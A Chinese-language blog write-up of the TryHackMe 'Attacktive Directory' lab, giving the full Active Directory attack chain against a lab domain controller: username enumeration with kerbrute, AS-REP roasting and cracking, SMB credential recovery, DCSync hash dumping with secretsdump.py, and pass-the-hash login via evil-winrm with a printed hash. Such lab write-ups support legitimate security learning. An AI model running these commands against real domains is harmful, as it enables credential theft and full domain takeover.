Attacktive Directory on Tryhackme

--- title: Attacktive Directory on Tryhackme date: 2024-03-03 21:10:04 tags: - AD - Active Directory - Windows - Pentesting - TryHackMe --- ## Before all TryHackMe 上的連結：[https://tryhackme.com/room/attacktivedirectory](https://tryhackme.com/room/attacktivedirectory) AD是什麼? [Wikipedia 上的介紹](https://zh.wikipedia.org/zh-tw/Active_Directory) 在台灣好厲駭的課有聽過一次Mars大大的AD課程，但因為真的第一次接觸加上東西爆炸多，其實也沒真的學進去多少(頂多觀念)，剛好在TryHackMe上看到一堆AD靶機，就來打打吧~ 這台機器的在一個AD網路環境，它代表的是一台Kerberos DC(Domain Controller)。雖然說這有點事後諸葛，但是本題的攻擊鍊是： :::info 字典攻擊找username -> TGT暴破svc-admin的密碼 -> 用 svc-admin 的身分登入 smb 找到使用者 backup 的密碼備份檔 ->用 backup 的身分透過DRSUAPI的方法炸出每個使用者的hash -> 利用 Pass The Hash 攻擊登入 Administrator ::: Victim's IP : 10.10.162.250 Victim's Host : spookysec.local Attacker's IP : 10.9.195.189 **註：** 記得去變更`/etc/hosts`設定檔改Host Name ## Write Up ### RECON #### nmap **Command** `nmap -sC -sV -Pn 10.10.162.250` **Result** ``` Nmap scan report for 10.10.162.143 Host is up (0.29s latency). Not shown: 987 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 |_http-title: IIS Windows Server | http-methods: |_ Potentially risky methods: TRACE 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-03-03 08:36:16Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 3389/tcp open ms-wbt-server Microsoft Terminal Services | ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local | Not valid before: 2024-03-02T08:23:05 |_Not valid after: 2024-09-01T08:23:05 |_ssl-date: 2024-03-03T08:36:43+00:00; +1s from scanner time. | rdp-ntlm-info: | Target_Name: THM-AD | NetBIOS_Domain_Name: THM-AD | NetBIOS_Computer_Name: ATTACKTIVEDIREC | DNS_Domain_Name: spookysec.local | DNS_Computer_Name: AttacktiveDirectory.spookysec.local | Product_Version: 10.0.17763 |_ System_Time: 2024-03-03T08:36:34+00:00 Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2024-03-03T08:36:37 |_ start_date: N/A | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required |_clock-skew: mean: 1s, deviation: 0s, median: 0s ``` **Analyze** 有smb service, RDP，整體架構是AD網路，HOST NAME是`spookysec.local` #### enum4linux **Command** `enum4linux -a spookysec.local` **Result** ![image](https://hackmd.io/_uploads/rJCVc-zpT.png) ![image](https://hackmd.io/_uploads/rkwr5WzaT.png) 許多User資料被炸出來獲得NetBios Name是THM-AD(但以後續動作來看沒什麼功能...) #### kerbrute 新工具，可以去Github上下載到： [Click Me : https://github.com/ropnop/kerbrute/releases](https://github.com/ropnop/kerbrute/releases) 透過題目提供的userlist.txt進行攻擊(也有提供password.txt做後續的hash爆破) **Result** ![image](https://hackmd.io/_uploads/HyBxo-Ga6.png) ### Exploit 首先，安裝Impacket工具包 ```bash git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket pip3 install -r /opt/impacket/requirements.txt cd /opt/impacket/ && python3 ./setup.py install ``` 可能會需要掛`sudo`(後續攻擊行為也有很多需要，就不贅述) #### TGT Attack with svc-admin 獲取TGT的原理大致上是在kerberos驗證的時候進行訊息劫持...(?應該啦) **注意我這時候在的路徑是`/opt/impacket/examples`** 利用Impacket的`GetNPUsers.py`進行攻擊 **Command** ```py python3 GetNPUsers.py spookysec.local/svc-admin -no-pass ``` **Result** ![image](https://hackmd.io/_uploads/Skyfhbz6p.png) **password cracking** 把剛剛的結果丟到`pass` `john pass --wordlist=passwordlist.txt` ![image](https://hackmd.io/_uploads/SkztnZGa6.png) #### SMB to get backup's password 這步沒太多東西，就是拿到剛剛svc-hosts的密碼後登入smb service `smbclient -U svc-admin //10.10.162.143/backup` ![image](https://hackmd.io/_uploads/B1cCh-z6a.png) 密碼get!! ![image](https://hackmd.io/_uploads/BJZXTWfT6.png) #### backup to Administrator 利用Impackets中的`secretsdump.py`結合backup權限炸出各個使用者的密碼 hash **Command** `sudo python3 secretsdump.py -just-dc backup@spookysec.local` **Result** ![image](https://hackmd.io/_uploads/SkG70Zfaa.png) 拿到密碼hash後透過Pass The Hash攻擊登入admin *What is pass the hash attack?* 看這篇：[https://wwwstar.medium.com/%E5%85%A7%E7%B6%B2%E6%BB%B2%E9%80%8F-pass-the-hash-pth-%E6%94%BB%E6%93%8A%E6%89%8B%E6%B3%95%E5%8F%8A%E9%98%B2%E7%A6%A6-%E5%81%B5%E6%B8%AC%E6%8E%AA%E6%96%BD-e1d15e807a67](https://wwwstar.medium.com/%E5%85%A7%E7%B6%B2%E6%BB%B2%E9%80%8F-pass-the-hash-pth-%E6%94%BB%E6%93%8A%E6%89%8B%E6%B3%95%E5%8F%8A%E9%98%B2%E7%A6%A6-%E5%81%B5%E6%B8%AC%E6%8E%AA%E6%96%BD-e1d15e807a67) 利用`evil-winrm`工具進行Pass The Hash攻擊直接登入 **Command** `evil-winrm -i 10.10.88.124 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc` **Result** ![image](https://hackmd.io/_uploads/BkREJMzp6.png) *RCE!!!* **如何確認自己在AD裡面的身分：** `Get-ADUser -Identity "Administrator" -Properties *` ## After all 經過這台靶機感覺多會了蠻多技巧，AD還有超級超級多要學，繼續努力w 附上打這台機器沒什麼用但還是物盡其用搞得RDP ![image](https://hackmd.io/_uploads/Hyq1xMfpp.png) 駭客ㄉ浪漫啊~ 晚ㄢ :>